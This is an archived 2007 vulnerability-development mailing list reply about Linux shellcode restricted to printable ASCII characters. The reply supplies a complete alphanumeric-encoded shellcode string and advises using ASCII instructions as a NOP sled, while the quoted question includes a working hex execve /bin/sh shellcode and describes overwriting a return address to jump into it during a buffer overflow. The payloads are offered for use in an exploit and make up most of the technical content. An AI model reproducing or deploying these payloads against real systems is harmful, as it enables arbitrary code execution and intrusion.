Vulnerability Development mailing list archives
Re: Linux restricted ASCII Shellcode
From: shadown <shadown () gmail com>
Date: Mon, 23 Apr 2007 09:58:49 +0200
Hi,

Here you have your shellcode in ASCII format.

'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY19II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T'

If the code you are trying to exploit does NOT allow non-ASCII NOPs (that actually is the only thing that makes sense), instead of '\x90' you will have to use some ASCII opcode/bytecode string that can be used as a NOP sled (for example 'A' -> inc ecx).

Cheers,
Sergio

nonexistant () nospam org wrote:
> Yes, I'm having a seg-fault, but I can't catch you... AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here? Am I wrong?
>
> Moreover, I've tried more than 5 different ASCII shellcodes, all with the same result... Always segfaulting. It looks as if the shellcodes were not working for some common reason...
>
> So, summarizing:
>
> 1.- I can perfectly overwrite RET, thus having EIP pointing almost 100% of the time to the NOPs of my shellcode (in an environment variable)
> 2.- My -non-ascii- shellcode works perfectly
> 3.- When I try with ANY pure ASCII shellcode, it fails 100% of the time.
>
> What is happening?
>
> I've tried with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>
> Metasploit framework failed to convert the original shellcode -the one that works- to pure ASCII with the selected charset (A-Z,a-z,0-9).
>
> That's the original shellcode:
>
> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
>
> Is anyone able to convert this to pure ASCII, or give me a working pure ASCII shellcode, or help me understand why all the pure ASCII shellcodes are failing in my exploit?
>
> Thank you,
--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown () gmail com

This message is confidential. It may also contain information that is privileged or otherwise legally exempt from disclosure. If you have received it by mistake please let us know by e-mail immediately and delete it from your system; you should also not copy the message nor disclose its contents to anyone. Many thanks.
Current thread:
- Linux restricted ASCII Shellcode notexist (Apr 16)
- Re: Linux restricted ASCII Shellcode Jerome Athias (Apr 16)
- Re: Linux restricted ASCII Shellcode nnp (Apr 16)
- <Possible follow-ups>
- Re: Re: Linux restricted ASCII Shellcode nonexistant (Apr 19)
- Re: Linux restricted ASCII Shellcode Deian Stefan (Apr 20)
- Re: Re: Linux restricted ASCII Shellcode RaiSe (Apr 24)
- Re: Re: Linux restricted ASCII Shellcode nonexistant (Apr 22)
- Re: Re: Linux restricted ASCII Shellcode Deian Stefan (Apr 22)
- Re: Linux restricted ASCII Shellcode shadown (Apr 24)
- Re: Linux restricted ASCII Shellcode shadown (Apr 24)
- Re: Linux restricted ASCII Shellcode Jerome Athias (Apr 16)